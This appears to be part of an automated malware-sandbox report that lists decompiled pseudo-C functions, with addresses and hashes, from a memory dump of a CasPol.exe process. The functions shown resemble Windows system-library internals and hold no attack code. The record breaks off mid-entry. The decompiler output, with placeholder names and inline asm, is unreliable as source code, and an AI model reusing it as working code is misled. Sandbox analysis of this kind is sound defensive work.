                                                                0x01697cd0
                                                                0x00000000
                                                                0x01697ce8
                                                                0x0162c990
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ff9dc683e9c749af219801592709f459e22725ebf72ed5731f491e966917f781
                                                                • Instruction ID: ca038bbac63207406f386284597b5e01ef4beda5fa82e6d73c27b2e2c7431c59
                                                                • Opcode Fuzzy Hash: ff9dc683e9c749af219801592709f459e22725ebf72ed5731f491e966917f781
                                                                • Instruction Fuzzy Hash: E9112131320746DFCB25AF2CDC85A2BB7EABF84610B00052CE84193650DB20EC00CBE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016637F5 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 87%
                                                                			E016637F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01642280(_t6, 0x1718550);
				}
				_t29 = E0166387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0163FFB0(0x1718550, _t27, 0x1718550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                0x016637fa
                                                                0x016637fc
                                                                0x01663805
                                                                0x01663808
                                                                0x01663808
                                                                0x01663814
                                                                0x01663818
                                                                0x01663846
                                                                0x01663848
                                                                0x0166384b
                                                                0x0166384b
                                                                0x01663852
                                                                0x00000000
                                                                0x01663854
                                                                0x01663856
                                                                0x00000000
                                                                0x00000000
                                                                0x01663863
                                                                0x00000000
                                                                0x01663863
                                                                0x0166381a
                                                                0x0166381a
                                                                0x0166381f
                                                                0x0166386e
                                                                0x0166386e
                                                                0x01663871
                                                                0x01663873
                                                                0x01663873
                                                                0x01663868
                                                                0x00000000
                                                                0x01663868
                                                                0x01663821
                                                                0x01663826
                                                                0x00000000
                                                                0x00000000
                                                                0x01663828
                                                                0x0166382a
                                                                0x01663841
                                                                0x00000000
                                                                0x01663841

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b5d8327b9622387fe42d3b23e545666987b1e90b7d8347b7493b2f990777370
                                                                • Instruction ID: 9ad18dd85cb4c8726896937f1674fbb505c70869e8ee68bf1c8e5f986a01dca9
                                                                • Opcode Fuzzy Hash: 1b5d8327b9622387fe42d3b23e545666987b1e90b7d8347b7493b2f990777370
                                                                • Instruction Fuzzy Hash: B8018472A056119BC3378A1E9D40A6ABBBEFF86A60717446DE94D8B315D730D801C7D4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165002D Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E0165002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01647D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01647D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01647D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01647D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                0x01650032
                                                                0x01650037
                                                                0x01650043
                                                                0x01694b3a
                                                                0x01650049
                                                                0x01650049
                                                                0x01650049
                                                                0x0165004e
                                                                0x01650053
                                                                0x01694b48
                                                                0x01694b5a
                                                                0x01694b4a
                                                                0x01694b53
                                                                0x01694b53
                                                                0x01694b5f
                                                                0x00000000
                                                                0x01694b61
                                                                0x00000000
                                                                0x01694b61
                                                                0x01650059
                                                                0x01650059
                                                                0x01650060
                                                                0x01694b6f
                                                                0x01694b6f
                                                                0x01650069
                                                                0x01694b83
                                                                0x00000000
                                                                0x00000000
                                                                0x01694b90
                                                                0x01694b9b
                                                                0x01694b9b
                                                                0x01694ba4
                                                                0x00000000
                                                                0x00000000
                                                                0x01694baa
                                                                0x00000000
                                                                0x0165006f
                                                                0x0165006f
                                                                0x00000000
                                                                0x0165006f
                                                                0x01650069

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                • Instruction ID: 3f5b3b74347dbc1d736d5dc71e03aed8211d0b583b1bbc9d72ac18f82961b0d5
                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                • Instruction Fuzzy Hash: 0F11C4336156818FEB239B2CDE54B357BD9EF41794F0900A0ED4487796DB29D843C664
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0163766D Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 94%
                                                                			E0163766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0165F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0165F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01644620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                0x01637672
                                                                0x0163767f
                                                                0x01637689
                                                                0x016376de
                                                                0x016376de
                                                                0x0163768b
                                                                0x01637691
                                                                0x01637693
                                                                0x01637697
                                                                0x00000000
                                                                0x01637699
                                                                0x016376a8
                                                                0x00000000
                                                                0x016376aa
                                                                0x016376ad
                                                                0x016376b1
                                                                0x00000000
                                                                0x016376b3
                                                                0x016376b3
                                                                0x016376b5
                                                                0x016376ba
                                                                0x016376bc
                                                                0x016376bc
                                                                0x016376c0
                                                                0x00000000
                                                                0x016376c2
                                                                0x016376ce
                                                                0x016376ce
                                                                0x016376c0
                                                                0x016376b1
                                                                0x016376a8
                                                                0x01637697
                                                                0x016376d9

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                • Instruction ID: e127aa26c03b15ada093239d5d71fd6688624aa74dfedcbf72331828c4f73850
                                                                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                • Instruction Fuzzy Hash: 12018872700129ABD7209E5ECC51E5B7BADEFC5660F240564BA08CB250DA30DD0197A4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01629080 Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 69%
                                                                			E01629080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x17185ec;
				E01642280(_t48, 0x17185ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0163FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x171538c; // 0x77996828
					if( *_t84 != 0x1715388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x16ff6e8);
						E0167D0E8(0x17185ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E016F88F5(_t80, _t85, 0x1715388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x17186c0; // 0x11c07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x17186b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01642280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E016F88F5(0x17185ec, _t85, 0x1715388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0166AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x171b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x17184c0;
																			if(_t82 >=  *0x17184c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E016F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0162922A(_t99);
										_t64 = E01647D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E016F8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x17186c0; // 0x11c07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x17186b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x17186bc;
													_t87 = 0x17186b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01629240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x17186c4;
												_t87 = 0x17186c0;
												L27:
												E01659B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0167D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1715388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x171538c = _t51;
						goto L6;
					}
				}
			}




















                                                                0x01629082
                                                                0x01629083
                                                                0x01629084
                                                                0x01629085
                                                                0x01629087
                                                                0x01629096
                                                                0x01629098
                                                                0x01629098
                                                                0x0162909e
                                                                0x016290a8
                                                                0x016290e7
                                                                0x016290e7
                                                                0x016290aa
                                                                0x016290b0
                                                                0x016290b7
                                                                0x016290bd
                                                                0x016290dd
                                                                0x016290e6
                                                                0x016290bf
                                                                0x016290bf
                                                                0x016290c7
                                                                0x016290cf
                                                                0x016290f1
                                                                0x016290f2
                                                                0x016290f4
                                                                0x016290f5
                                                                0x016290f6
                                                                0x016290f7
                                                                0x016290f8
                                                                0x016290f9
                                                                0x016290fa
                                                                0x016290fb
                                                                0x016290fc
                                                                0x016290fd
                                                                0x016290fe
                                                                0x016290ff
                                                                0x01629100
                                                                0x01629102
                                                                0x01629107
                                                                0x0162910c
                                                                0x01629110
                                                                0x01629113
                                                                0x01629115
                                                                0x01629136
                                                                0x0162913f
                                                                0x01629143
                                                                0x016837e4
                                                                0x016837e4
                                                                0x01629117
                                                                0x01629117
                                                                0x0162911d
                                                                0x00000000
                                                                0x0162911f
                                                                0x0162911f
                                                                0x01629125
                                                                0x00000000
                                                                0x01629127
                                                                0x0162912d
                                                                0x01629130
                                                                0x01629134
                                                                0x01629158
                                                                0x0162915d
                                                                0x01629161
                                                                0x01629168
                                                                0x01683715
                                                                0x0162916e
                                                                0x0162916e
                                                                0x01629175
                                                                0x01629177
                                                                0x0162917e
                                                                0x0162917f
                                                                0x01629182
                                                                0x01629182
                                                                0x01629187
                                                                0x01629187
                                                                0x0162918a
                                                                0x0162918d
                                                                0x0162918f
                                                                0x01629192
                                                                0x01629195
                                                                0x01629198
                                                                0x01629198
                                                                0x01629198
                                                                0x0162919a
                                                                0x00000000
                                                                0x00000000
                                                                0x0168371f
                                                                0x01683721
                                                                0x01683727
                                                                0x0168372f
                                                                0x01683733
                                                                0x01683735
                                                                0x01683738
                                                                0x0168373b
                                                                0x0168373d
                                                                0x01683740
                                                                0x00000000
                                                                0x01683746
                                                                0x01683746
                                                                0x01683749
                                                                0x00000000
                                                                0x0168374f
                                                                0x0168374f
                                                                0x01683751
                                                                0x01683757
                                                                0x01683759
                                                                0x0168375c
                                                                0x0168375c
                                                                0x0168375e
                                                                0x0168375e
                                                                0x01683761
                                                                0x01683764
                                                                0x00000000
                                                                0x00000000
                                                                0x01683766
                                                                0x01683768
                                                                0x016837a3
                                                                0x016837a3
                                                                0x016837a5
                                                                0x016837a7
                                                                0x016837ad
                                                                0x016837b0
                                                                0x016837b2
                                                                0x016837bc
                                                                0x016837c2
                                                                0x016837c2
                                                                0x016837b2
                                                                0x01629187
                                                                0x01629187
                                                                0x0162918a
                                                                0x0162918d
                                                                0x0162918f
                                                                0x01629192
                                                                0x01629195
                                                                0x00000000
                                                                0x01629195
                                                                0x00000000
                                                                0x0168376a
                                                                0x0168376a
                                                                0x0168376a
                                                                0x0168376c
                                                                0x0168376c
                                                                0x0168376f
                                                                0x01683775
                                                                0x00000000
                                                                0x00000000
                                                                0x01683777
                                                                0x01683779
                                                                0x01683782
                                                                0x01683787
                                                                0x01683789
                                                                0x01683790
                                                                0x01683790
                                                                0x0168378b
                                                                0x0168378b
                                                                0x0168378b
                                                                0x01683792
                                                                0x01683795
                                                                0x00000000
                                                                0x01683795
                                                                0x00000000
                                                                0x01683779
                                                                0x01683798
                                                                0x00000000
                                                                0x01683798
                                                                0x00000000
                                                                0x01683768
                                                                0x0168379b
                                                                0x0168379b
                                                                0x01683751
                                                                0x01683749
                                                                0x00000000
                                                                0x01683740
                                                                0x016291a0
                                                                0x016291a3
                                                                0x016291a9
                                                                0x016291b0
                                                                0x00000000
                                                                0x016291b0
                                                                0x01629187
                                                                0x016291b4
                                                                0x016291b4
                                                                0x016291bb
                                                                0x016291c0
                                                                0x016291c5
                                                                0x016291c7
                                                                0x016837da
                                                                0x016291cd
                                                                0x016291cd
                                                                0x016291cd
                                                                0x016291d2
                                                                0x016291d5
                                                                0x01629239
                                                                0x01629239
                                                                0x016291d7
                                                                0x016291db
                                                                0x016291e1
                                                                0x016291e7
                                                                0x016291fd
                                                                0x01629203
                                                                0x0162921e
                                                                0x01629223
                                                                0x00000000
                                                                0x01629205
                                                                0x01629205
                                                                0x01629208
                                                                0x0162920c
                                                                0x01629214
                                                                0x01629214
                                                                0x0162920c
                                                                0x016291e9
                                                                0x016291e9
                                                                0x016291ee
                                                                0x016291f3
                                                                0x016291f3
                                                                0x016291f3
                                                                0x016291e7
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x01629134
                                                                0x01629125
                                                                0x0162911d
                                                                0x0162914e
                                                                0x016290d1
                                                                0x016290d1
                                                                0x016290d3
                                                                0x016290d6
                                                                0x016290d8
                                                                0x00000000
                                                                0x016290d8
                                                                0x016290cf

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 44290cdd658b36c24840e9eeac176c89a96cc0afc8eb1153d800abe416f984cc
                                                                • Instruction ID: 30cd31c7997f5194d24f22c37ff86c8c11e15e0ebe58a35e5d721c230b16398a
                                                                • Opcode Fuzzy Hash: 44290cdd658b36c24840e9eeac176c89a96cc0afc8eb1153d800abe416f984cc
                                                                • Instruction Fuzzy Hash: 38018172505A288FD3299F1CDC40B12BBA9EBC6728F25816AE6059B795C378DC41CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016BC450 Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 46%
                                                                			E016BC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01669910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E016695B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E016695D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E016695D0();
				return L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                0x016bc458
                                                                0x016bc45d
                                                                0x016bc466
                                                                0x016bc468
                                                                0x016bc469
                                                                0x016bc46a
                                                                0x016bc46b
                                                                0x016bc46e
                                                                0x016bc46f
                                                                0x016bc471
                                                                0x016bc476
                                                                0x016bc476
                                                                0x016bc47c
                                                                0x016bc47e
                                                                0x016bc480
                                                                0x016bc480
                                                                0x016bc483
                                                                0x016bc484
                                                                0x016bc486
                                                                0x016bc488
                                                                0x016bc48f
                                                                0x016bc491
                                                                0x016bc493
                                                                0x016bc493
                                                                0x016bc48f
                                                                0x016bc498
                                                                0x016bc49e
                                                                0x016bc4ad
                                                                0x016bc4ad
                                                                0x016bc4b2
                                                                0x016bc4b4
                                                                0x016bc4cd

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                • Instruction ID: ccf22815b2c1803df4978312e8a9a7945e69a3fc713328ae8a72818ad37ba5ad
                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                • Instruction Fuzzy Hash: C801B572140506BFE721AF69CD80EA2FB7EFF64394F004529F61442660CB35EDA1CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F4015 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 86%
                                                                			E016F4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E01642280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E01642280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x17186ac);
					E0162F900(0x17186d4, _t28);
					E0163FFB0(0x17186ac, _t28, 0x17186ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0163FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                0x016f401a
                                                                0x016f401e
                                                                0x016f4023
                                                                0x016f4028
                                                                0x016f4029
                                                                0x016f402b
                                                                0x016f402f
                                                                0x016f4043
                                                                0x016f4046
                                                                0x016f4051
                                                                0x016f4057
                                                                0x016f405f
                                                                0x016f4062
                                                                0x016f4067
                                                                0x016f406f
                                                                0x016f407c
                                                                0x016f407c
                                                                0x016f408c
                                                                0x016f408c
                                                                0x016f4097

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f25da722ce737dbcd3b79dc44a147a2294a8be15f1e1b7d2534fca8921ae4c96
                                                                • Instruction ID: 958f18d626aa7702c251cc115f8f079fcacff9f39317ab800584e068247e13e5
                                                                • Opcode Fuzzy Hash: f25da722ce737dbcd3b79dc44a147a2294a8be15f1e1b7d2534fca8921ae4c96
                                                                • Instruction Fuzzy Hash: E3018F726019467FD311AB6DCD80E13B7ADFB95760B00062DF60887A21CB24EC11CAE8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016E138A Relevance: .0, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 61%
                                                                			E016E138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x171d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0166FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E01647D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0166B640(E01669AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                0x016e138a
                                                                0x016e138a
                                                                0x016e1399
                                                                0x016e13a3
                                                                0x016e13a8
                                                                0x016e13aa
                                                                0x016e13b5
                                                                0x016e13bb
                                                                0x016e13c3
                                                                0x016e13c6
                                                                0x016e13c9
                                                                0x016e13d4
                                                                0x016e13e6
                                                                0x016e13d6
                                                                0x016e13df
                                                                0x016e13df
                                                                0x016e13f1
                                                                0x016e13f2
                                                                0x016e13f4
                                                                0x016e13f9
                                                                0x016e140e

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 082867df6634c1be7ae5aaaca515b859ad08aabf57aec41d171faf2bdb722c2f
                                                                • Instruction ID: ae9768e8001e27d31c0cea6c4cc638c685801040c54205ea7d0b224b6794458f
